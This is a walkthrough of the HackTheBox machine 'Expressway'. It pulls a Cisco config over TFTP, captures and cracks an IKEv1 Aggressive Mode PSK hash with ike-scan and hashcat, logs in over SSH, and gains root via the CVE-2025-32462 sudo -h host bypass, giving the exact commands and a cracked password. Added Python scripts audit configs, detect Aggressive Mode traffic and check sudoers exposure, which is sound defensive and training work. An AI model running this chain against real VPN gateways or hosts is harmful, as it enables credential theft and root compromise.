🛣️Expressway
HTB Expressway — Detailed Solution Notes
Platform: HackTheBox | Machine: Expressway | OS: Linux | Difficulty: Easy | Vulnerability Types: TFTP Misconfiguration, IKEv1 Aggressive Mode PSK Hash Capture, CVE-2025-32462 (sudo -h bypass)
How Does a Hacker Think? — From an Open TFTP Server to Root
Expressway looks quiet from the outside. Only one TCP port is open — SSH — and there is no web application to poke at. The real attack surface is hiding in UDP. A TFTP server with no authentication is serving a Cisco router config file to anyone who asks. That config file contains a VPN pre-shared key and a username. From there, an IKEv1 Aggressive Mode handshake leaks a crackable hash. Cracking the hash gives SSH credentials. Once inside, a recent sudo vulnerability — CVE-2025-32462 — lets a low-privilege user impersonate another host and run any command as root.
1. Reconnaissance
Network Scan
nmap -p 22 -sV -sC 10.129.238.52
nmap -sU -p 68,69,500,4500 -sV 10.129.238.52
The TCP scan returns only port 22, running OpenSSH 10.0p2 on Debian Linux. There is nothing else to attack over TCP. The UDP scan tells a different story. Port 69 is TFTP. Ports 500 and 4500 are ISAKMP and IPsec NAT-T — this machine is running a VPN service.
TFTP Enumeration
nmap -sU -p 69 --script tftp-enum 10.129.238.52
The tftp-enum script finds one file: ciscortr.cfg. This is a Cisco router configuration file sitting on the TFTP server with no access control.
2. Config File Extraction — TFTP
How Does a Hacker Think?
TFTP has no authentication at all. Any client that knows a filename can download it. Network devices like routers and switches use TFTP to load their configs on boot — the config file has to be readable without a login because the device has no credentials loaded yet at that point. Administrators who leave TFTP running forget that anyone on the network — or in a CTF, anyone on the internet — can read whatever is being served.
tftp 10.129.238.52
tftp> get ciscortr.cfg
tftp> quit
cat ciscortr.cfg
The config file reveals the full VPN setup.
Key findings from the config:
username ike password *****
crypto isakmp client configuration group rtr-remote
key secret-password
crypto ipsec client ezvpn ezvpnclient
group 2 key secret-password
mode client
peer 192.168.100.1
The VPN group name is rtr-remote. The pre-shared key is secret-password. The VPN username is ike. This is a Cisco EzVPN setup using IKEv1 with pre-shared key authentication.
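The defensive counterpart to reading a leaked config is auditing it before it ever reaches a TFTP share. The script below is an added example, not part of the writeup or a Cisco tool: it walks an IOS-style config and flags the material that made this machine fall, i.e. local users with plaintext or type 7 passwords, IKE pre-shared keys written into the config, and a PSK-based ISAKMP policy with no "crypto isakmp aggressive-mode disable" line. The sample config is constructed to mirror the shape of ciscortr.cfg; every secret in it is a placeholder, not the machine's real key or password.

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass
class Finding:
    line_no: int      # 0 means a whole-config observation
    severity: str
    message: str


# Constructed sample in the shape of the ciscortr.cfg described above;
# all secret values are placeholders, not the machine's real credentials.
SAMPLE_CONFIG = """\
!
hostname ciscortr
!
username ike password 0 EXAMPLE-PLACEHOLDER
username admin secret 5 $1$EXAMPLE$HASH
enable secret 5 $1$EXAMPLE$HASH
!
crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 2
!
crypto isakmp client configuration group rtr-remote
 key EXAMPLE-PSK-PLACEHOLDER
 dns 192.168.100.1
!
crypto ipsec client ezvpn ezvpnclient
 connect auto
 group 2 key EXAMPLE-PSK-PLACEHOLDER
 mode client
 peer 192.168.100.1
!
"""

# 'password' (type 0 or 7) is recoverable from the config; 'secret' is a hash.
USERNAME_PW = re.compile(r"username\s+(\S+)\s+password\s+(?:(\d)\s+)?\S+")
ENABLE_PW = re.compile(r"enable\s+password\s+(?:(\d)\s+)?\S+")
# IKE pre-shared keys as IOS writes them: the global 'crypto isakmp key',
# 'key' inside a client configuration group, and 'group <name> key' in an EzVPN client block.
PSK_LINES = [
    re.compile(r"crypto\s+isakmp\s+key\s+"),
    re.compile(r"key\s+\S+$"),
    re.compile(r"group\s+\S+\s+key\s+\S+"),
]


def audit_cisco_config(text: str) -> List[Finding]:
    """Flag credential material that leaves the device together with a TFTP-served config."""
    findings: List[Finding] = []
    uses_psk = False
    aggressive_disabled = False
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = USERNAME_PW.match(line)
        if m:
            user, ptype = m.groups()
            kind = "type 7 (reversible)" if ptype == "7" else "plaintext"
            findings.append(Finding(n, "HIGH", f"{kind} password for local user '{user}'; use 'secret'"))
            continue
        if ENABLE_PW.match(line):
            findings.append(Finding(n, "HIGH", "enable password stored reversibly; use 'enable secret'"))
            continue
        if any(p.match(line) for p in PSK_LINES):
            uses_psk = True
            findings.append(Finding(n, "HIGH", "IKE pre-shared key present in config"))
            continue
        if line == "authentication pre-share":
            uses_psk = True
        elif line == "crypto isakmp aggressive-mode disable":
            aggressive_disabled = True
    if uses_psk and not aggressive_disabled:
        findings.append(Finding(0, "MEDIUM",
                                "PSK authentication configured and 'crypto isakmp aggressive-mode disable' absent"))
    return findings


if __name__ == "__main__":
    for f in audit_cisco_config(SAMPLE_CONFIG):
        print(f"[{f.severity}] line {f.line_no}: {f.message}")
```

Run against the sample it reports the plaintext ike password, both copies of the pre-shared key and the missing aggressive-mode lockout, which is exactly the chain the rest of this writeup follows.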
3. IKEv1 Aggressive Mode — PSK Hash Capture
How Does a Hacker Think?
IKEv1 has two negotiation modes. Main Mode encrypts the identities of both parties before they are exchanged, which is what makes it the safer choice. Aggressive Mode completes the handshake in three packets instead of six — faster, but the identity and a hash keyed by the pre-shared key travel in the clear. If an attacker can trigger an Aggressive Mode handshake, they receive a hash that can be cracked offline with a wordlist. Cisco EzVPN typically uses Aggressive Mode because the client needs to identify its group name during the handshake.
ike-scan -M --aggressive --id=rtr-remote 10.129.238.52
The server responds with a full Aggressive Mode handshake. Two details stand out: the identity is ike@expressway.htb, and XAUTH is advertised — meaning after the IKE tunnel is established, the server will ask for a username and password.
Capture the Hash
ike-scan -M --aggressive --id=rtr-remote \
--pskcrack=/home/kali/psk.txt 10.129.238.52
The PSK hash is written to psk.txt. The hash format is IKEv1 Aggressive Mode with SHA1, which is hashcat mode 5400.
Crack the Hash
hashcat -m 5400 /home/kali/psk.txt /usr/share/wordlists/rockyou.txt --force
The hash cracks quickly.
Credentials obtained: ike : freakingrockstarontheroad
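From the defender's side, the question is whether your gateway answers Aggressive Mode at all, and ike-scan's handshake is visible on the wire as an ISAKMP message with exchange type 4. The following is an added example (not from the writeup or from ike-scan) of a small detector: it parses the ISAKMP header from UDP/500 and UDP/4500 payloads, ignores IKEv2 and ESP-in-UDP, and raises an alert for IKEv1 Aggressive Mode, distinguishing a client's initiation from the gateway's response, since the response is the packet that carries the PSK-keyed hash. The sample datagrams, addresses and SPIs are constructed for the demonstration.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

# ISAKMP header (RFC 2408 section 3.1): initiator SPI, responder SPI, next payload,
# version (major nibble, minor nibble), exchange type, flags, message ID, length.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
EXCHANGE_TYPES = {1: "Base", 2: "Identity Protection (Main Mode)",
                  3: "Authentication Only", 4: "Aggressive", 5: "Informational"}
NON_ESP_MARKER = b"\x00\x00\x00\x00"   # prefix on IKE packets carried over UDP/4500


@dataclass
class IsakmpHeader:
    initiator_spi: bytes
    responder_spi: bytes
    next_payload: int
    major: int
    minor: int
    exchange_type: int
    flags: int
    message_id: int
    length: int


def parse_isakmp(payload: bytes, dst_port: int = 500) -> Optional[IsakmpHeader]:
    """Parse the ISAKMP header of one UDP payload; None if it is not an IKE message."""
    if dst_port == 4500:
        if not payload.startswith(NON_ESP_MARKER):
            return None          # UDP-encapsulated ESP, not IKE
        payload = payload[4:]
    if len(payload) < ISAKMP_HDR.size:
        return None
    ispi, rspi, np_, ver, etype, flags, mid, length = ISAKMP_HDR.unpack_from(payload)
    if length != len(payload):   # the length field must cover the whole message
        return None
    return IsakmpHeader(ispi, rspi, np_, ver >> 4, ver & 0xF, etype, flags, mid, length)


def aggressive_mode_alert(hdr: IsakmpHeader) -> Optional[str]:
    """Alert on IKEv1 Aggressive Mode. A response (responder SPI set) means the
    gateway accepted the exchange and has sent its PSK-keyed hash in the clear."""
    if hdr.major != 1 or hdr.exchange_type != 4:
        return None              # IKEv2 has no Aggressive Mode; Main Mode is fine
    stage = "initiation" if hdr.responder_spi == bytes(8) else "response"
    return f"IKEv1 Aggressive Mode {stage} (exchange type 4)"


def scan_datagrams(datagrams: List[Tuple[str, int, bytes]]) -> List[str]:
    """datagrams: (source address, destination port, UDP payload)."""
    alerts = []
    for src, dport, payload in datagrams:
        hdr = parse_isakmp(payload, dport)
        if hdr is None:
            continue
        msg = aggressive_mode_alert(hdr)
        if msg:
            alerts.append(f"{src}: {msg}")
    return alerts


def build_ike(exchange_type: int, responder_spi: bytes = bytes(8), version: int = 0x10) -> bytes:
    """Constructed IKE message with a dummy SA payload body, used for the sample below."""
    body = b"\x00" * 40
    hdr = ISAKMP_HDR.pack(b"\x11" * 8, responder_spi, 1, version, exchange_type, 0, 0,
                          ISAKMP_HDR.size + len(body))
    return hdr + body


# Constructed sample traffic: a Main Mode initiation, an Aggressive Mode initiation, the
# gateway's Aggressive Mode response, an IKEv2 SA_INIT, ESP-in-UDP, and Aggressive Mode over NAT-T.
SAMPLE_DATAGRAMS = [
    ("10.0.0.5", 500, build_ike(2)),
    ("10.0.0.5", 500, build_ike(4)),
    ("10.0.0.1", 500, build_ike(4, responder_spi=b"\x22" * 8)),
    ("10.0.0.5", 500, build_ike(34, version=0x20)),
    ("10.0.0.5", 4500, b"\xaa\xbb\xcc\xdd" + b"\x00" * 60),
    ("10.0.0.5", 4500, NON_ESP_MARKER + build_ike(4)),
]

if __name__ == "__main__":
    for src, dport, payload in SAMPLE_DATAGRAMS:
        hdr = parse_isakmp(payload, dport)
        name = EXCHANGE_TYPES.get(hdr.exchange_type, str(hdr.exchange_type)) if hdr else "not IKE"
        print(f"{src}:{dport} -> {name}")
    for alert in scan_datagrams(SAMPLE_DATAGRAMS):
        print("ALERT", alert)
```

An alert for a response from your own gateway address is the one that matters: it confirms the gateway still negotiates Aggressive Mode, which is what the audit finding in the previous section warns about.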
4. Initial Foothold — SSH
ssh ike@10.129.238.52
The SSH session opens. The ike user is a member of the proxy group in addition to their own group — a detail worth noting for later.
User flag obtained: /home/ike/user.txt ✅
5. Privilege Enumeration
How Does a Hacker Think?
After getting a shell, the first question is always: what can this user do that a normal user cannot? sudo -l checks for allowed sudo commands. SUID binaries run as their owner regardless of who executes them — any SUID binary owned by root is a potential escalation path. The proxy group membership also suggests this machine is running a proxy service that the ike user has some relationship to.
sudo -l
The ike user has no sudo privileges on this machine — at least not under the standard sudo binary.
find / -perm -4000 -type f 2>/dev/null
Two entries stand out immediately:
/usr/sbin/exim4
/usr/local/bin/sudo
There are two sudo binaries on this system: the standard one at /usr/bin/sudo and a second one at /usr/local/bin/sudo. Checking the version:
/usr/local/bin/sudo --version
Version 1.9.17 — vulnerable to CVE-2025-32462.
Squid Proxy Logs
The proxy group membership points toward Squid. Reading the access logs reveals a request to offramp.expressway.htb — a hostname that only appears on this internal network.
cat /var/log/squid/access.log.1
The log shows a denied request: GET http://offramp.expressway.htb. This hostname becomes the key to the privilege escalation.
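Proxy logs disclose internal names to anyone who can read them, so a defender wants to know which names a log exposes before deciding who may read it. The script below is an added example, not part of the writeup or of Squid: it parses Squid's native access.log format, resolves the destination host for both plain and CONNECT requests, and lists the names under a given internal domain together with how often and by whom they were requested. The log lines are constructed for the demonstration (documentation IP ranges, not the machine's), and "expressway.htb" is taken from the hostname seen in the writeup.

```python
import re
from collections import defaultdict
from typing import Dict, List
from urllib.parse import urlsplit

# Squid native access.log format: timestamp, elapsed ms, client, result/status,
# bytes, method, URL, ident, hierarchy/peer, content type.
LOG_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+(?P<ms>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)/(?P<status>\d+)\s+"
    r"(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<user>\S+)\s+(?P<hier>\S+)\s+(?P<ctype>\S+)$"
)

# Constructed sample lines in that format; addresses are documentation ranges, not the machine's.
SAMPLE_LOG = """\
1727000000.123     45 10.0.0.10 TCP_DENIED/403 3961 GET http://offramp.expressway.htb/ - HIER_NONE/- text/html
1727000001.456    120 10.0.0.10 TCP_MISS/200 1523 GET http://deb.debian.org/debian/dists/trixie/InRelease - HIER_DIRECT/192.0.2.10 text/plain
1727000002.789      0 10.0.0.11 TCP_DENIED/403 3961 CONNECT offramp.expressway.htb:443 - HIER_NONE/- text/html
1727000003.000     30 10.0.0.11 TCP_MISS/200 812 GET http://deb.debian.org/debian/pool/main/ - HIER_DIRECT/192.0.2.10 application/octet-stream
this line is not in squid format and is skipped
"""


def dest_host(method: str, url: str) -> str:
    """Destination hostname; CONNECT requests are logged as 'host:port' rather than a URL."""
    if method == "CONNECT":
        return url.rsplit(":", 1)[0]
    return urlsplit(url).hostname or url


def summarize(log_text: str) -> Dict[str, dict]:
    """Per destination host: request count, denied count, and the set of clients that asked."""
    hosts: Dict[str, dict] = defaultdict(lambda: {"requests": 0, "denied": 0, "clients": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        entry = hosts[dest_host(m["method"], m["url"])]
        entry["requests"] += 1
        entry["clients"].add(m["client"])
        if "DENIED" in m["result"]:
            entry["denied"] += 1
    return dict(hosts)


def hosts_in_domain(summary: Dict[str, dict], domain: str) -> List[str]:
    """Names under an internal domain that the log discloses, most requested first."""
    suffix = "." + domain.lower().lstrip(".")
    names = [h for h in summary if h.lower().endswith(suffix)]
    return sorted(names, key=lambda h: -summary[h]["requests"])


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    for host in hosts_in_domain(s, "expressway.htb"):
        e = s[host]
        print(f"{host}: {e['requests']} requests, {e['denied']} denied, clients={sorted(e['clients'])}")
```

Denied requests are kept deliberately: a request Squid refused still records the name that was asked for, which is exactly how offramp.expressway.htb surfaced on this machine.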
6. Privilege Escalation — CVE-2025-32462
How Does a Hacker Think?
CVE-2025-32462 is a logic flaw in the -h (host) option of sudo versions 1.8.8 through 1.9.17. The -h flag was designed to let users list their sudo privileges for a different host — useful in environments where one sudoers file is shared across many machines. The bug is that -h works not just with -l (list) but with actual command execution. When you run sudo -h somehost command, sudo evaluates the sudoers rules for somehost instead of the current machine. If those rules are more permissive, you get more access than you should. No exploit code is needed — it is a built-in sudo flag being used outside its intended context.
Check the Remote Host Rules
/usr/local/bin/sudo -l -h offramp.expressway.htb
The output shows that on offramp.expressway.htb, the ike user can run any command as root with no password.
User ike may run the following commands on offramp:
(root) NOPASSWD: ALL
Exploit
/usr/local/bin/sudo -h offramp.expressway.htb -u root /bin/bash
A root shell opens on the local machine.
Root flag obtained: /root/root.txt ✅
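The two preconditions the section describes, a sudo in the affected range and a sudoers rule scoped to some other host, are both things an administrator can check without running sudo -h at all. The script below is an added example (not from the writeup, not from the sudo project) that parses the first line of "sudo --version" against the 1.8.8 to 1.9.17 range stated above, walks a sudoers file (including Host_Alias expansion) for rules whose host field names a machine other than the local one, and reports the box as exposed only when both hold. The sudoers text and version banner are constructed samples; the "ike offramp" rule mirrors the rule shown in the writeup, the others are invented.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Affected range as stated in the writeup: 1.8.8 through 1.9.17 (fixed in 1.9.17p1).
VULN_MIN = (1, 8, 8, 0)
VULN_MAX = (1, 9, 17, 0)


def parse_sudo_version(banner: str) -> Optional[Tuple[int, int, int, int]]:
    """Turn the first line of 'sudo --version' into a comparable tuple; the 'p' patch level is last."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", banner)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_vulnerable(v: Tuple[int, int, int, int]) -> bool:
    return VULN_MIN <= v <= VULN_MAX


@dataclass
class HostRule:
    line_no: int
    user: str
    host: str
    spec: str


def foreign_host_rules(sudoers: str, local_hostname: str) -> List[HostRule]:
    """Rules whose host field names a machine other than this one.

    On an affected sudo, 'sudo -h <that host>' evaluates these rules locally, so each
    one is a privilege the user can obtain here, not only on the host it was written for."""
    aliases: Dict[str, List[str]] = {}
    local = local_hostname.lower()
    rules: List[HostRule] = []
    for n, raw in enumerate(sudoers.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = re.match(r"Host_Alias\s+(\w+)\s*=\s*(.+)", line)
        if m:
            aliases[m.group(1)] = [h.strip() for h in m.group(2).split(",")]
            continue
        if re.match(r"(User|Runas|Cmnd)_Alias\s", line):
            continue
        m = re.match(r"(\S+)\s+([^=\s]+)\s*=\s*(.+)", line)
        if not m:
            continue
        user, hosts, spec = m.groups()
        for token in hosts.split(","):
            for host in aliases.get(token, [token]):
                h = host.lower()
                if h == "all" or h == local or h.split(".")[0] == local.split(".")[0]:
                    continue      # already applies to this machine; -h adds nothing
                rules.append(HostRule(n, user, host, spec))
    return rules


def assess(version_banner: str, sudoers: str, local_hostname: str) -> dict:
    v = parse_sudo_version(version_banner)
    rules = foreign_host_rules(sudoers, local_hostname)
    vulnerable = v is not None and version_vulnerable(v)
    return {"version": v, "vulnerable_version": vulnerable,
            "foreign_host_rules": rules, "exposed": vulnerable and bool(rules)}


# Constructed samples; not the machine's real sudoers or sudo output.
SAMPLE_BANNER = "Sudo version 1.9.17\nSudoers policy plugin version 1.9.17\n"
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset
Host_Alias WEB = webhost, expressway
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
ike offramp = (root) NOPASSWD: ALL
deploy WEB = (www-data) /usr/bin/systemctl restart nginx
"""

if __name__ == "__main__":
    result = assess(SAMPLE_BANNER, SAMPLE_SUDOERS, "expressway")
    print("sudo", result["version"], "in affected range:", result["vulnerable_version"])
    for r in result["foreign_host_rules"]:
        print(f"line {r.line_no}: {r.user} on {r.host} -> {r.spec}")
    print("exposed:", result["exposed"])
```

Run it once per sudo binary on the system: the writeup's point that /usr/local/bin/sudo was the affected copy while /usr/bin/sudo was not means a single version check is not enough.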
Core Techniques Used
TFTP has no authentication by design. It was built for network devices that need to load a config before they have any credentials available. Leaving it exposed with sensitive files is equivalent to leaving those files on a public web server. The Cisco config in this case contained everything needed to impersonate a VPN client.
IKEv1 Aggressive Mode leaks a crackable hash. When a VPN server responds to an Aggressive Mode handshake, it sends the PSK hash derived from the pre-shared key before any encryption is established. That hash can be taken offline and attacked with a wordlist. The authentication method pre-share in the Cisco config was the signal that this attack was possible.
XAUTH adds a second credential layer to IKEv1. The VPN was configured to ask for a username and password after the IKE tunnel was established. In this case, the same credentials that appeared in the config also worked for SSH — credential reuse across services is common when a single administrator sets up both.
CVE-2025-32462 abuses a trusted sudo flag. The -h option was present in sudo for over 12 years before anyone noticed it could be used to run commands under the rules of a different host. The vulnerability requires that sudoers contain at least one host-specific rule — a configuration that is common in enterprise environments where one policy file covers many machines. Seeing a second sudo binary in /usr/local/bin was the signal to check its version and look for known CVEs.
Log files reveal internal hostnames. The Squid access log contained a request to offramp.expressway.htb — a hostname that was not discoverable through DNS or any other enumeration path. Reading proxy logs is a low-effort step that can expose internal network topology that the attacker would not otherwise know about.
Key Topics
- UDP Enumeration
- TFTP File Download
- Cisco Router Config Analysis
- IKEv1 / ISAKMP
- IKEv1 Aggressive Mode
- PSK Hash Capture with ike-scan
- Hashcat Mode 5400 (IKE-PSK SHA1)
- XAUTH
- Cisco EzVPN
- Squid Proxy Log Analysis
- SUID Binary Enumeration
- CVE-2025-32462
- sudo -h Host Bypass
- Privilege Escalation via Sudoers Host Rule